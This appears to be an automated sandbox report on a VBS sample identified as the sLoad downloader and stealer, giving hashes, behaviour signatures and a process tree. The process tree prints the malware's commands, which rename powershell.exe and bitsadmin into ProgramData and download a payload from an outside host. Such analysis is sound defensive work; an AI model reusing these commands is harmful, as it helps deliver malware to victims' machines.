Overview

overview

10

Static

static

c069b74525...52.vbs

windows7_x64

10

c069b74525...52.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    28-03-2022 01:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs

  • Size

    6KB

  • MD5

    11f6b0f1a90680ea7f7d57b68ff305ee

  • SHA1

    b1793a0401e017b90f8dea32bdf4d27c1af82fae

  • SHA256

    c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52

  • SHA512

    69f219dc9b61146447850a802c31bbaf10f2b8624418dcf12bfdfcf6bf116c5d68c1d2fea79f3f4afa533b9f0134c7d911863a3d61816aecab58a1b4e1950e7a

Score
10/10
sloadstealertrojan

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

    trojanstealersload
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3484
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zoZjp.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\KFJYToh*.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1392
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zoZjp.exe
        3⤵
          PID:4008
        • C:\Windows\system32\cmd.exe
          cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\KFJYToh*.exe
          3⤵
            PID:624
        • C:\ProgramData\KFJYTohin.exe
          "C:\ProgramData\KFJYTohin.exe" /transfer NEcBQb /download https://fhivelifestyle.online/lidepato/BRGDRD68M16L682M/uk.css C:\Users\Admin\AppData\Roaming\uk.css
          2⤵
          • Executes dropped EXE
          PID:1044

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\KFJYTohin.exe
        Filesize

        182KB

        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

        Download Submit

      • C:\ProgramData\KFJYTohin.exe
        Filesize

        182KB

        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

        Download Submit

      • memory/624-136-0x0000000000000000-mapping.dmp

        Download

      • memory/1044-138-0x0000000000000000-mapping.dmp

        Download

      • memory/1392-134-0x0000000000000000-mapping.dmp

        Download

      • memory/4008-135-0x0000000000000000-mapping.dmp

        Download